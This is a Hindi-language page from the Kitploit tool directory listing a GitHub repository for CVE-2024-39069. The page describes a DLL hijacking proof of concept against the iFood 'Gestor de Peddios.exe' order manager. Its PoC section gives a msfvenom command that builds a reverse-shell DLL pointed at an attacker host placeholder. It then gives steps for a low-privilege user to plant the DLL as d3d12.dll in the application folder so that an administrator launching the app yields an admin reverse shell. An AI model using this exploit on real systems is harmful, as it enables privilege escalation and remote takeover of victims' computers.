Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-39069 — CVE-2024-39069 | Kitploit
उपकरण/GitHubGitHub/aungsoepaing/cve-2024-39069
विशेषाधिकार वृद्धिपेलोड जनरेशनशोषणशेलकोडपेनिट्रेशन टेस्टिंगबाइनरी शोषण
GitHubaungsoepaing/cve-2024-39069

CVE-2024-39069

CVE-2024-39069

रिपॉजिटरी देखें
22 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ifood Order Manager 'Gestor de Peddios.exe' - DLL हाइजैकिंग

एक हमलावर 'd3d12.dll' नामक एक दुर्भावनापूर्ण DLL को ऐसी निर्देशिका में रखता है जिसे एप्लिकेशन वैध 'd3d12.dll' मिलने से पहले खोजता है। जब एप्लिकेशन लॉन्च किया जाता है, तो यह वैध DLL के बजाय दुर्भावनापूर्ण DLL को लोड करता है, जिससे हमलावर एप्लिकेशन के संदर्भ में मनमाना कोड निष्पादित कर सकता है।

Vendor Homepage: https://gestordepedidos.ifood.com.br/

Google Drive: https://drive.google.com/file/d/1p5SavlbLAE2o59l8jj4j-FkE_Ne_0Y-P/view?usp=sharing

POC video: https://youtu.be/oMIobV2M0T8

POC

  1. काली लिनक्स पर msfvenom के साथ दुर्भावनापूर्ण dll फ़ाइल बनाएं

    root@kitploit:~
    msfvenom -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f dll -o d3d12.dll
    
  2. निम्न स्तर के उपयोगकर्ता पहुंच के रूप में काली से विंडोज होस्ट पर बनाई गई 'd3d12.dll' को स्थानांतरित करें

  3. निम्न स्तर के उपयोगकर्ता पहुंच के रूप में बनाई गई 'd3d12.dll' फ़ाइल को 'C:\Gestor de Peddios\d3d12.dll' पर ले जाएं

  4. जब व्यवस्थापक एप्लिकेशन चलाता है, तो आपको व्यवस्थापक के रूप में रिवर्स शेल प्राप्त होगा

टूल डाउनलोड करें